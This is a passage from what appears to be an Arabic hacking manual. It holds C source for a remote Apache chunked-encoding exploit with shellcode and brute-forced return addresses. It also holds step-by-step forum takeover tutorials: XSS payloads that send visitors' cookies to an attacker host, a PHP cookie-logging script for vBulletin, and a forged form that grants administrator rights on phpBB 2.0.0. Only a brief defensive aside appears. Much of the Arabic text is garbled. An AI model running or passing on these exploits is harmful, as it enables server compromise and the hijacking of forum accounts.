int bruteforce, owned, progress, sc_timeout = 5;
int responses, shown_length = 0;
struct in_addr ia;
struct sockaddr_in sin, from;
struct hostent *he;

if(argc < 4)
usage();

bruteforce = 0;
memset(&victim, 0, sizeof(victim));
while((i = getopt(argc, argv, \\\"t:b:d:h:w:c:r:z:o:\\\")) != -1) {
switch(i) {
/* required stuff */
case \\'h\\':
hostp = strtok(optarg, \\\":\\\");
if((portp = strtok(NULL, \\\":\\\")) == NULL)
portp = \\\"80\\\";
break;

/* predefined targets */
case \\'t\\':
if(atoi(optarg) >= sizeof(targets)/sizeof(victim)) {
printf(\\\"Invalid target\\\\n\\\");
return -1;
}

memcpy(&victim, &targets[atoi(optarg)], sizeof(victim));


break;

/* bruteforce! */
case \\'b\\':
bruteforce++;
victim.type = \\\"Custom target\\\";
victim.retaddr = strtoul(optarg, NULL, 16);
printf(\\\"Using 0x%lx as the baseadress while bruteforcing..\\\\n\\\",

٢٢٦
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

victim.retaddr);
break;

case \\'d\\':
victim.delta = atoi(optarg);
printf(\\\"Using %d as delta\\\\n\\\", victim.delta);
break;

case \\'r\\':
victim.repretaddr = atoi(optarg);
printf(\\\"Repeating the return address %d times\\\\n\\\",
victim.repretaddr);
break;

case \\'z\\':
victim.repzero = atoi(optarg);
printf(\\\"Number of zeroes will be %d\\\\n\\\", victim.repzero);
break;

case \\'o\\':
bruteforce++;
switch(*optarg) {
case \\'f\\':
victim.type = \\\"FreeBSD\\\";
victim.retaddr = 0x80a0000;
victim.delta = -150;
victim.repretaddr = 6;
victim.repzero = 36;
break;

case \\'o\\':
victim.type = \\\"OpenBSD\\\";
victim.retaddr = 0x80000;
victim.delta = -146;
victim.repretaddr = 6;
victim.repzero = 36;
break;

case \\'n\\':
victim.type = \\\"NetBSD\\\";
victim.retaddr = 0x080e0000;
victim.delta = -90;

٢٢٧
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

victim.repretaddr = 5;
victim.repzero = 42;
break;

default:
printf(\\\"[-] Better luck next time!\\\\n\\\");
break;
}
break;

/* optional stuff */
case \\'w\\':
sc_timeout = atoi(optarg);
printf(\\\"Waiting maximum %d seconds for replies from
shellcode\\\\n\\\", sc_timeout);
break;

case \\'c\\':
cmdz = optarg;
break;

default:
usage();
break;
}
}

if(!victim.delta || !victim.retaddr || !victim.repretaddr || !victim.repzero) {


printf(\\\"[-] Incomplete target. At least 1 argument is missing (nmap
style!!)\\\\n\\\");
return -1;
}

printf(\\\"[*] Resolving target host.. \\\");


fflush(stdout);
he = gethostbyname(hostp);
if(he)
memcpy(&ia.s_addr, he->h_addr, 4);
else if((ia.s_addr = inet_addr(hostp)) == INADDR_ANY) {
printf(\\\"There\\'z no %s on this side of the Net!\\\\n\\\", hostp);
return -1;
}

٢٢٨
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

printf(\\\"%s\\\\n\\\", inet_ntoa(ia));

srand(getpid());
signal(SIGPIPE, SIG_IGN);
for(owned = 0, progress = 0;;victim.retaddr += RET_ADDR_INC) {
/* skip invalid return adresses */
if(memchr(&victim.retaddr, 0x0a, 4) || memchr(&victim.retaddr, 0x0d, 4))
continue;

sock = socket(PF_INET, SOCK_STREAM, 0);


sin.sin_family = PF_INET;
sin.sin_addr.s_addr = ia.s_addr;
sin.sin_port = htons(atoi(portp));
if(!progress)
printf(\\\"[*] Connecting.. \\\");

fflush(stdout);
if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) {
perror(\\\"connect()\\\");
exit(1);
}

if(!progress)
printf(\\\"connected!\\\\n\\\");

p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) *


REP_SHELLCODE)
+ ((PADSIZE_1 + (victim.repretaddr * 4) + victim.repzero
+ 1024) * REP_POPULATOR));

PUT_STRING(\\\"GET / HTTP/1.1\\\\r\\\\nHost: \\\" HOST_PARAM


\\\"\\\\r\\\\n\\\");

for (i = 0; i < REP_SHELLCODE; i++) {


PUT_STRING(\\\"X-\\\");
PUT_BYTES(PADSIZE_3, PADDING_3);
PUT_STRING(\\\": \\\");
PUT_BYTES(NOPCOUNT, NOP);

٢٢٩
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

memcpy(p, shellcode, sizeof(shellcode) - 1);


p += sizeof(shellcode) - 1;
PUT_STRING(\\\"\\\\r\\\\n\\\");
}

for (i = 0; i < REP_POPULATOR; i++) {


PUT_STRING(\\\"X-\\\");
PUT_BYTES(PADSIZE_1, PADDING_1);
PUT_STRING(\\\": \\\");
for (j = 0; j < victim.repretaddr; j++) {
*p++ = victim.retaddr & 0xff;
*p++ = (victim.retaddr >> 8) & 0xff;
*p++ = (victim.retaddr >> 16) & 0xff;
*p++ = (victim.retaddr >> 24) & 0xff;
}

PUT_BYTES(victim.repzero, 0);
PUT_STRING(\\\"\\\\r\\\\n\\\");
}

PUT_STRING(\\\"Transfer-Encoding: chunked\\\\r\\\\n\\\");
snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", PADSIZE_2);
PUT_STRING(buf);
PUT_BYTES(PADSIZE_2, PADDING_2);
snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", victim.delta);
PUT_STRING(buf);

if(!shown_length) {
printf(\\\"[*] Exploit output is %u bytes\\\\n\\\", (unsigned int)(p -
expbuf));
shown_length = 1;
}

write(sock, expbuf, p - expbuf);

progress++;
if((progress%70) == 0)
progress = 1;

if(progress == 1) {
printf(\\\"\\\\r[*] Currently using retaddr 0x%lx\\\", victim.retaddr);
for(i = 0; i < 40; i ++)

٢ ٣٠
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

printf(\\\" \\\");
printf(\\\"\\\\n\\\");
if(bruteforce)
putchar(\\';\\');
}
else
putchar(((rand()>>8)%2)? \\'P\\': \\'p\\');

fflush(stdout);
responses = 0;
while (1) {
fd_set fds;
int n;
struct timeval tv;

tv.tv_sec = sc_timeout;
tv.tv_usec = 0;

FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(sock, &fds);

memset(buf, 0, sizeof(buf));
if(select(sock + 1, &fds, NULL, NULL, owned? NULL : &tv) > 0) {
if(FD_ISSET(sock, &fds)) {
if((n = read(sock, buf, sizeof(buf) - 1)) < 0)
break;

if(n >= 1)
{
if(!owned)
{
for(i = 0; i < n; i ++)
if(buf[i] == \\'G\\')
responses ++;
else
responses = 0;
if(responses >= 2)
{
owned = 1;
write(sock, \\\"O\\\", 1);

٢ ٣١
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

write(sock, cmdz, strlen(cmdz));


printf(\\\" it\\'s a TURKEY: type=%s, delta=%d, retaddr=0x%lx,
repretaddr=%d, repzero=%d\\\\n\\\", victim.type, victim.delta,
victim.retaddr, victim.repretaddr, victim.repzero);
printf(\\\"Experts say this isn\\'t exploitable, so nothing will happen
now: \\\");
fflush(stdout);
}
} else
write(1, buf, n);
}
}

if(FD_ISSET(0, &fds)) {
if((n = read(0, buf, sizeof(buf) - 1)) < 0)
exit(1);

write(sock, buf, n);


}

if(!owned)
break;
}

free(expbuf);
close(sock);

if(owned)
return 0;

if(!bruteforce) {
fprintf(stderr, \\\"Ooops.. hehehe!\\\\n\\\");
return -1;
}
}

return 0;
}

٢ ٣٢
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

(( ‫ﻗﺒ ﻞ ﻮ ﺿﻌﻬﺎﻟﻜﻢ ﻫﻨﺎ‬angels-bytes.com ‫ﺘﺒﺎرﻫﺎ ﻣﻦﻗﺒ ﻞ‬


‫))ﻗﺪﺗﻢﺗﺠ ﺮﯾﺒﻬﺎ وإ ﺧ‬

‫ﻮﻫﺬي وﺻﻠﺔﺗﻨﺰﯾ ﻞاﻟﺒ ﺮﻧﺎﻣ ﺞ‬


http://www.angels-bytes.com/?show=tools&action=info&id=19

.....

٢ ٣٣
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" اﺧﱰاق اﳌﻨﺘﺪﯾﺎت ﻣﻦ ﻧﻮع ‪" vBulletin2,2,0‬‬

‫‪$$$$$$‬‬
‫ـﻮ ل‬
‫ـﻘ‬
‫ـ‬‫ـﻨ‬
‫ـ‬
‫ﻣ‬
‫‪$$$$$$‬‬

‫‪---------‬‬
‫ﻣﻘﺪﻣﺔ ‪:‬‬
‫‪---------‬‬

‫ـ ‪vBulletin‬‬‫ﺘ ﺮا قاﻟ‬
‫اﻟﻤﻮ ﺿﻮ ع ‪:‬ا ﺧ‬
‫ﺘ ﺮﻧ ﺖ )اﻛﺴﺒﻠﻮرر( ‪.‬‬
‫ﺘﺼﻔﺢاﻧ‬
‫ﺘﻄﻠﺒﺎ ت ‪) WebServer :‬ﺗ ﺮﻛﯿﺐ ﺳﯿ ﺮﻓ ﺮ ﻋﻠﻰ ﺟﻬﺎزكاﻟﺸﺨﺼﻲ( ‪ +‬ﻣ‬ ‫اﻟﻤ‬
‫ﺘﻮﺳﻂ‬ ‫ﺘﻮى ‪ :‬ﻣ‬‫اﻟﻤﺴ‬

‫ﺘﺪﯾﺎ ت ‪.‬‬
‫ـ ‪vBulletin‬ﻓﻘﻂ !! ﯾﻤﻜﻦانﺗﺠ ﺮﺑﻬﺎ ﻋﻠﻰاﻧﻮا عا ﺧ ﺮى ﻣﻦاﻟﻤﻨ‬
‫ﻣﻼ ﺣﻈﺔ ‪:‬ﻫﺬهاﻟﻄ ﺮﯾﻘﺔﻟﺴ ﺖﻟﻠ‬

‫‪----------‬‬
‫اﻟﺜﻐ ﺮة ‪:‬‬
‫‪----------‬‬

‫ﺘﻲﺗﺴ ﺮ قاﻟﻜﻮﻛﯿﺰﺑﺎﻻ ﺿﺎﻓﺔاﻟﻰ ﺟﻌ ﻞ‬


‫ﺘﺎ تاﻟﺨﺒﯿﺜﺔاﻟ‬
‫ﻗﺴﺎم ‪..‬أوﻻﺑﻌ ﺾاﻟﺴﻜ ﺮﺑ‬‫ﺗﻨﻘﺴﻢ ﻃ ﺮﯾﻘﺔاﻟﻌﻤ ﻞاﻟﻰ ﻋﺪةا‬
‫ﺘﻘﺒ ﻞ‬
‫ﺘﺪى ﯾﺴ‬ ‫اﻟﻤﻨ‬
‫ـ ‪.. HTML‬‬‫ﺘﺪىﺑﺄﻛﻮاداﻟ‬ ‫ﺘ ﺮطان ﯾﺴﻤﺢاﻟﻤﻨ‬
‫ﺑﯿﺎﻧﺎ ت ﻣﻦ ﻣﻜﺎن ﺧﺎ ﻃﻲ ء ‪..‬ﻟﻜﻦ ﯾﺸ‬

‫ﺘﺐاي ﻣﻮ ﺿﻮ ع واﻟﺼ ﻖﺑﯿﻦاﻟﺴﻄﻮر‬


‫ـ ‪.. ( HTML‬ﺛﻢاﻛ‬
‫ﺘﺪى ﯾﺪﻋﻢاﻟ‬
‫ﺘﺎﺑﺔ ﻣﻮ ﺿﻮ ع ﺟﺪﯾﺪاو رد )ﻓﻲ ﻣﻨ‬‫ﻗﻢﺑﻜ‬
‫ﻫﺬااﻟﻜﻮد ‪:‬‬
‫> ‪script>document.write('<img‬‬
‫‪<src="http://my_ip_address/'+document.cookie+'">';</script‬‬

‫ـ ‪IP‬اﻟﺨﺎ صﺑﻚ ‪.‬‬ ‫ﻗﻢاﻟ‬ ‫ـ ‪IP Adress‬اﻟﻰ ر‬ ‫ﻣﻊ ﻣﻼ ﺣﻈﺔﺗﻐﯿ ﺮاﻟ‬


‫ﺘﻨﻔﯿﺬاﻻواﻣ ﺮﻓﻲ‬ ‫ﺘﻮىاﻟﺼﻔ ﺤﺔﻓﺎناﻟﺴﻜ ﺮﺑ ﺖاﻟﺬيﻗﻤﻨﺎﺑﻮ ﺿﻌﻪ ﺳﯿﻘﻮمﺑ‬ ‫وﻋﻨﺪﻣﺎ ﯾﻘﻮم ﺷﺨ ﺺ ﻣﺎﺑﻘ ﺮا ءة ﻣ ﺤ‬
‫ﺘﺪى ‪..‬ﺛﻢ ﯾﻘﻮماﻟﺴﻜ ﺮﺑ ﺖ‬‫ﺘﻮي ﻋﻠﻰاﻟﺒﺎﺳﻮرداﻟﺨﺎ ﺻﺔﺑﺎﻟﻤﻨ‬ ‫ﺘﻲﺗ ﺤ‬ ‫ﻗ ﺮا ءة ﺟﺰ ء ﻣﻦا ﺣﺪ ﻣﻠﻔﺎ تاﻟﻜﻮﻛﯿﺰاﻟ‬ ‫ﺟﻬﺎز و‬
‫ﺘﻪ ﺳﺎﺑﻘﺎ )ﻣﻊ ﻣﻼ ﺣﻈﺔاﻧﻪ ﯾﺠﺐان ﯾﻜﻮن ﻋﻠﻰ ﺟﻬﺎزي‬ ‫ﺘﺎﺑ‬‫ﻗﻢاﻻيﺑﻲاﻟﺬيﻗﻤﻨﺎﺑﻜ‬ ‫ﺘ ﺤﻮﯾ ﻞﻫﺬهاﻟﺴﻄﻮراﻟﻰ ر‬ ‫ﺑ‬
‫ﺳﯿ ﺮﻓ ﺮ ﻣﺜ ﻞ ‪IIS‬او ‪Apache‬او ﻏﯿ ﺮﻫﺎ ( ‪.‬‬
‫ﺘﻮﯾﻪ ﺟﻬﺎزك ‪..‬‬‫ـ ‪Log‬اﻟﺨﺎ صﺑﺎﻟﺴﯿ ﺮﻓ ﺮاﻟﺬي ﯾ ﺤ‬ ‫ﺘﺢ ﻣﻠ ﻒاﻟ‬ ‫ﺘﻢاﻟﻌﻤﻠﯿﺔﺑﻨﺠﺎ حﻗﻢﺑﻔ‬ ‫وﺑﻌﺪانﺗ‬
‫ﺘ ﺮ ‪. Acces Log‬‬ ‫ﺘ ﺮ ‪ logs‬وا ﺧ‬ ‫ﺘﺎ حاﻟﻤﺠﻠﺪ ‪ Apche‬وا ﺧ‬ ‫ﻣﺜﺎ لﻟﻮﻛﺎناﻟﺴﯿ ﺮﻓ ﺮاﺑﺎﺗﺸﻲ ‪..‬ﻓ‬
‫ﺘﻬﺎ ﻣﻦاﻟﺴﯿ ﺮﻓ ﺮ ‪..‬إﻟ ﺦ‬ ‫ﺘﻲ ﻃﻠﺒ‬ ‫ﺘﺠﺪ ﺟﻤﯿﻊاﻻواﻣ ﺮاﻟ‬ ‫ﺳ‬
‫اﺑ ﺤﺚ ﻋﻦاﻟﻜﻮداﻟﺨﺎ صﺑﺎﻟﺒﺎﺳﻮرد ‪ ..‬ﻣﺜﺎ ل ‪:‬‬
‫‪GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb‬‬
‫‪ddf90622;%20sessionhash=a‬‬
‫‪cd620534914930b86839c4bb5f8;%20bbthreadview[54٤٧١٩‬‬

‫‪٢ ٣٤‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫؛‪bblastvi ٢٠%‬‬ ‫‪١٠١٢٤٤٤٠٦٤=[٢٠‬‬


‫‪sit=1011983161‬‬
‫ﻓﻜ ﺮﻗﻠﯿﻼاﻻن ‪..‬اﯾﻦاﻟﺒﺎﺳﻮرد ؟؟‬
‫اﻟﺒﺎﺳﻮرد ﻣﻮﺟﻮدةﻟﻜﻦﺑﻄ ﺮﯾﻘﺔ ﻣﺸﻔ ﺮة ﯾﺼﻌﺐﻛﺴ ﺮﻫﺎ ‪..‬اذن ﻣﺎﻟ ﺤ ﻞ ؟‬
‫ﺘﺼﻔﺢ ‪..‬ﺑﻬﺬااﻟﺸﻜ ﻞ‬ ‫ﻗﻢﺑﻨﺴ ﺦاﻟﻜﻮداﻟﺬي وﺟﺪﺗﻪ واﻟﺼﻘﻪﻓﻲاﻟﻤ‬
‫[=‪http://www.victim.com/vb/index.php?bbuserid=[userid]&bbpassword‬‬
‫‪[password hash‬‬
‫ﻗ ﺖ ﻣﻨﻪاﻟﻜﻮﻛﯿﺰ‪" (....‬‬ ‫ـﺎ )اﺳﻢاﻟﺬي ﺳ ﺮ‬‫ﺘﺠﺪ ﻋﺒﺎرة ‪" :‬أﻫﻼﺑﻌﻮدﺗﻚ ﯾ‬ ‫ﺳ‬
‫ﻗ ﺖ ﻣﻨﻪاﻟﻜﻮﻛﯿﺰ( ‪..‬‬‫ﺘﺪى )اﻟﺬي ﺳ ﺮ‬ ‫ﺘ ﺤﻜﻢﺑﻜ ﻞ ﺷﻲ وﻛﺎﻧﻚ ﻣﺪﯾ ﺮاﻟﻤﻨ‬ ‫ﺘﻄﯿﻊاﻟ‬ ‫ﻓﻲ ﻫﺬهاﻟ ﺤﺎﻟﺔاﻧ ﺖاﻻنﺗﺴ‬
‫ﺘ ﺮوﻧﻲ‬
‫ﺘﻌﺪﯾ ﻞاﻟﺒ ﺮﯾﺪاﻻﻟﻜ‬
‫ﻗﻢﺑ‬ ‫ﺘ ﺤﻜﻢ( و‬‫ﺘ ﺤﻜﻢ ‪..‬اذﻫﺐاﻟﻰ )اﻟ‬ ‫ﺘﺎجاﻟﻰﻛﻠﻤﺔاﻟﻤ ﺮورﻟﻠﺪ ﺧﻮ لاﻟﻰﻟﻮ ﺣﺔاﻟ‬ ‫ﻟﻜﻨﻨﺎ ﻧ ﺤ‬
‫ﺘﺴﺠﯿ ﻞاﻟﺨ ﺮوج ‪..‬ﺛﻢاذﻫﺐاﻟﻰاداة ‪ .. Forgot Password‬وﻋﻨﺪﻫﺎ‬ ‫ﺛﻢﻗﻢﺑ‬ ‫اﻟﻰﺑ ﺮﯾﺪكاﻟﺨﺎ ص و‬
‫ﺘﻮيﺑﺎﺳﻮرداﻻدﻣﻦ ‪..‬‬ ‫ﺘﻘﺒﺎ لﺑ ﺮﯾﺪ ﯾ ﺤ‬
‫ﺘﻄﯿﻊاﺳ‬ ‫ﺗﺴ‬

‫ﺘ ﺤﻜﻢ واﻓﻌ ﻞ ﻣﺎﺗﺸﺎ ء ‪! ..‬‬


‫ﺘﻘﺪاﻧﻚﺗﻌﻠﻢ ﻣﺎ ﯾﺠﺐانﺗﻔﻌﻠﻪﺑﻌﺪ ذﻟﻚ !!اد ﺧ ﻞاﻟﻰﻟﻮ ﺣﺔاﻟ‬
‫اﻋ‬

‫‪------------‬‬
‫اﻟ ﺤ ﻞ ‪-:‬‬
‫‪-----------‬‬

‫ﺘﻘﻮﯾﻢ ‪... +‬‬


‫ﻗﯿﻊ ‪+‬اﻟ‬
‫ﺘﻮا‬
‫ﺘﺪى ‪+‬اﻟ ﺮﺳﺎﺋ ﻞاﻟﺨﺎ ﺻﺔ ‪+‬اﻟ‬ ‫ـ ‪HTML‬ﻓﻲ )اﻟﻤﻨ‬
‫ﻟﻠ ﺤﻤﺎﯾﺔ ﻣﻦ ﻫﺬهاﻟﺜﻐ ﺮةﻗﻢﺑﺎﻏﻼ قاﻟ‬
‫(‬
‫)واي ﻣﻨﻔﺬ ﯾﻤﻜﻦ ﻣﻦ ﺧﻼﻟﻪ و ﺿﻊﻛﻮد ‪HTML‬ﺑﺎي ﺻﻮرةﻛﺎﻧ ﺖ (‬

‫ﺘﺨﺪاﻣﻪﺑﺪ لﻛﻠﻤﺔ >‪<script‬ﻓﺎذا و ﺿﻌ ﺖ >‪<img‬‬ ‫ـ ‪ .. IMG‬ﻻﻧﻪﺑﺒﺴﺎ ﻃﺔﺑﺎﻣﻜﺎﻧﻚاﺳ‬ ‫ﻛﻤﺎ ﯾﺠﺐاﻏﻼﻛﻮداﻟ‬


‫او >‪<Demon‬او‬
‫ﺘﻢﺗﻨﻔﯿﺬاﻟﺴﻜ ﺮﺑ ﺖﺑﺸﻜ ﻞاوﺑﺎ ﺧ ﺮ ‪...‬ﻟﺬاﻛﻦ ﺣﺬرا واﻏﻠ ﻖ ﻫﺬهاﻟﻤﻨﺎﻓﺬ ‪.‬‬
‫ايﻛﻠﻤﺔا ﺧ ﺮىﻓﺎﻧﻪ ﺳﯿ‬
‫‪. Be Secret .. Dont' be Lamer‬‬

‫ﺘﺸﺎ فاﻟﺜﻐ ﺮة ‪٢٠٠٢- ١ - ٣١ :‬‬


‫ﺗﺎرﯾ ﺦاﻛ‬
‫ﺘﻬﺎ ﻋﻠﻰاﻻ ﺻﺪار ‪ ٢٫٢٫٠‬وﻫﻲﺗﻌﻤ ﻞﺑﻨﺠﺎ ح ‪....‬‬‫ﺗﻢﺗﺠ ﺮﺑ‬

‫‪٢ ٣٥‬‬
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

" vBulletin 2,2,9‫" ﺛﻐﺮة ﰲ ﻣﻨﺘﺪﯾﺎت‬

$$$$$$$$$$$$$$$
‫ـﺮ‬
‫ـ‬‫ـ‬
‫ـ‬<>‫ـﺪ‬
‫ـ‬
‫ـ‬<>‫ـ‬
‫ـ‬
‫ـ‬‫اﻟ‬:‫اﻟﻜﺎﺗﺐ‬
$$$$$$$$$$$$$$$$

vBulletin 2.2.9....‫ﺘﺪﯾﺎ ت‬
‫ﻫﺬهاﻟﺜﻐ ﺮة ﺧﻄﯿ ﺮة ﺟﺪا وﺗﺆديﺑ ﺤﺎﯾﺔاﻟﻤﻨ‬

:‫ﺘﺎﻟﻲ‬
‫ﺎﻟﻤﻬﻢ ﺷ ﺮ ﺣﻬﺎﻛﺎﻟ‬

php‫ﺘﺪاد‬‫اﻧﺴ ﺦاﻟﻜﻮد وا ﺣﻔﻈﻪﺑﺎﻟﻤﻔﻜ ﺮةﺑﺎﻣ‬-١


<?PHP
// vBulletin XSS Injection Vulnerability: Exploit
// ---
// Coded By : Sp.IC (SpeedICNet@Hotmail.Com).
// Descrption: Fetching vBulletin's cookies and storing it into a log file.

// Variables:

$LogFile = "Cookies.Log";

// Functions:
/*
If ($HTTP_GET_VARS['Action'] = "Log") {
$Header = "<!--";
$Footer = "--->";
}
Else {

$Header = "";
$Footer = "";
}
Print ($Header);
*/
Print ("<Title>vBulletin XSS Injection Vulnerability: Exploit</Title>");
Print ("<Pre>");
Print ("<Center>");
Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
Print ("Coded By: <B><A
Href=\"MailTo:SpeedICNet@Hotmail.Com\">Sp.IC</A></B><Hr
Width=\"20%\">");
/*

٢ ٣٦
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

Print ($Footer);
*/

Switch ($HTTP_GET_VARS['Action']) {
Case "Log":

$Data = $HTTP_GET_VARS['Cookie'];
$Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen (DecHex
(MD5 (NULL))))));
$Log = FOpen ($LogFile, "a+");
FWrite ($Log, Trim ($Data) . "\n");
FClose ($Log);
Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"0; URL=" .
$HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
Break;
Case "List":
If (!File_Exists ($LogFile) || !In_Array ($Records)) {
Print ("<Br><Br><B>There are No Records</B></Center></Pre>");
Exit ();
}
Else {
Print ("</Center></Pre>");
$Records = Array_UniQue (File ($LogFile));
Print ("<Pre>");
Print ("<B>.:: Statics</B>\n");
Print ("\n");
Print ("o Logged Records : <B>" . Count (File ($LogFile)) . "</B>\n");
Print ("o Listed Records : <B>" . Count ($Records) . " </B>[Not
Counting Duplicates]\n");
Print ("\n");

Print ("<B>.:: Options</B>\n");


Print ("\n");

If (Count (File ($LogFile)) > 0) {


$Link['Download'] = "[<A Href=\"" . $LogFile . "\">Download</A>]";
}
Else{
$Link['Download'] = "[No Records in Log]";
}

Print ("o Download Log : " . $Link['Download'] . "\n");

٢ ٣٧
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

Print ("o Clear Records : [<A Href=\"" . $SCRIPT_PATH.


"?Action=Delete\">Y</A>]\n");
Print ("\n");
Print ("<B>.:: Records</B>\n");
Print ("\n");

While (List ($Line[0], $Line[1]) = Each ($Records)) {


Print ("<B>" . $Line[0] . ": </B>" . $Line[1]);
}
}

Print ("</Pre>");
Break;
Case "Delete":
@UnLink ($LogFile);
Print ("<Br><Br><B>Deleted Succsesfuly</B></Center></Pre>") Or Die
("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre>");
Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" .
$HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
Break;
}
?>
php ‫ﻗﻊ ﯾﺪﻋﻢ‬ ‫ ﺎرﻓﻊاﻟﻤﻠ ﻒﻟﻤﻮ‬-٢
‫ ﺎﺟﻌ ﻞاﻟ ﻀ ﺤﯿﺔ ﯾ ﻀﻐﻂ ﻋﻠﻰ ﻫﺬا ﺎﻟﻠﯿﻨﻚ‬-٣
member2.php?s=[Session]&action=viewsubscription&perpage=[Script
Code]
[script code]‫ﺘﺒﺪا ل‬ ‫ﻮاﺳ‬
‫ﺑﻬﺬا‬
‫<ﻣﻜﺎن ﺎﻟﻤﻠ ﻒاﻟﺬيﺗﻢﺗ ﺤﻤﯿﻠﻪ‬Script>location='Http://[
]?Action=Log&Cookie='+(document.cookie);</Script>
‫ﺈذﻫﺐأﻟﻰ ﻫﺬااﻟﻌﻨﻮان‬4-
?Action=List‫ ﺎﻟﻤﻠ ﻒاﻟﺬيﺗﻢﺗ ﺤﻤﯿﻠﻪ‬/‫ﻣﻜﺎن‬http://%20

....

٢ ٣٨
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

" phpbb 2.0.0 ‫" اﺧﱰاق ﻣﻨﺘﺪﯾﺎت‬

$$$$$$$$$
‫ـﻮ ل‬
‫ـ‬
‫ـ‬‫ـ‬
‫ـ‬‫ـ‬
‫ـﻘ‬
‫ـ‬‫ـ‬
‫ـ‬
‫ـﻨ‬
‫ـ‬‫ـ‬
‫ﻣ‬
$$$$$$$$$

phpbb 2.0.0
vb ‫ـ‬
‫وﻫﻮ ﺷﺒﯿﻪﺑﺎﻟ‬

‫ﺘﺒ ﺮﺗﺎااﻓﻪ‬
‫وﻫﻮ ﺳﻬ ﻞ ﺟﺪاﺑ ﻞ ﯾﻌ‬

‫ﯾﺎ ﷲ ﺳﻤﻮﺑﺎ ﷲ‬

PhpBB2
admin_ug_auth.php ‫ﻓﻲ ﻣﻠ ﻒ‬
:‫اﻟﻮ ﺻ ﻒ‬
‫ﺘﺪى‬
‫ﯾﻤﻜﻨﻚ ﻣﻦ ﺧﻼ ل ﻫﺬهاﻟﺜﻐ ﺮةأنﺗﺄ ﺧﺬﺗﺼ ﺮﯾﺢﺑﺄنﺗﻜﻮن ﻣﺪﯾ ﺮ واﻟﻤﺸ ﺮ فاﻟﻌﺎم ﻋﻠﻰاﻟﻤﻨ‬
‫ﺘﻰ ﺷﺌ ﺖ‬
‫ﺘ ﺤﻜﻢ ﻣ‬‫وﺑﺬﻟﻚ ﯾﻤﻜﻨﻚاﻟﺪ ﺧﻮ لاﻟﻰﻟﻮ ﺣﺔاﻟ‬
:‫اﻷﺻﺪار‬
٢٫٠٫٠
‫ﺘﺪى‬‫ﺘﺠ ﺮﺑﺔاﻟﺜﻐ ﺮةاوﻻ ﺳﺠ ﻞﺑﺎﻟﻤﻨ‬‫ﻟ‬
‫ﺘﺪى‬ ‫ﺘﻚﺑﺎﻟﻤﻨ‬‫ﻗﻢ ﻋ ﻀﻮﯾ‬ ‫ﺛﻢا ﺣﻔﻆ ر‬
‫ﺘﺢاﻟﻤﻔﻜ ﺮة واﻧﺴ ﺦ ﻣﺎﯾﻠﻲاﻟﯿﻬﺎ‬‫ﺑﻌﺪﻫﺎاﻓ‬

<html>
<head>
<head/>
<body>

method="post" form>
action="http://www.domain_name/board_directory/admin/admin_ug_au
<th.php"
<select name="userlevel"> Level: User
<option/>Administrator<value="admin" option>
<select/><option/>User<value="user" option>
<name="private[1]" value="0" input type="hidden">
<value="0" input type="hidden" name="moderator[1]">
<value="user" input type="hidden" name="mode">
<input type="hidden" name="adv" value="">
<input type="text" name="u" size="5"> Number: User
<value="Submit" name="submit" input type="submit">

٢ ٣٩
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫>‪<form/‬‬
‫>‪<body/‬‬
‫>‪<html/‬‬

‫ﺘﻬﺪ ف‬‫ﻗﻊاﻟﻤﺴ‬ ‫ﻋﺪ ل ﻫﺬااﻟﻌﻨﻮاناﻟﻰ ﻋﻨﻮاناﻟﻤﻮ‬


‫‪http://www.domain_name/board_directory‬‬
‫ﺘﺪاد‪html‬‬ ‫ا ﺧﻔﻈﻪﺑﺎﻣ‬
‫ﺘﻲﻗﻤ ﺖﺑ ﺤﻔﻈﻬﺎ ﺳﻮ فﺗﺠﺪ‬ ‫ﻋﻨﺪﻣﺎﺗﺪ ﺧ ﻞاﻟﻰاﻟﺼﻔ ﺤﺔاﻟ‬
‫ﺘ ﺮﺗﺼ ﺮﯾﺢ ‪Administrator‬‬ ‫ﺘﻄﺒﯿ ﻖاﻟﺜﻐ ﺮةا ﺧ‬‫ﺘﺼ ﺮﯾﺢاﻟﺬيﺗ ﺮﯾﺪهﻟ‬ ‫ﺘﯿﺎراﻟ‬
‫ﺘﻢا ﺧ‬‫ﺘﻲ ﯾ‬‫ﻗﺎﺋﻤﺔ واﻟ‬
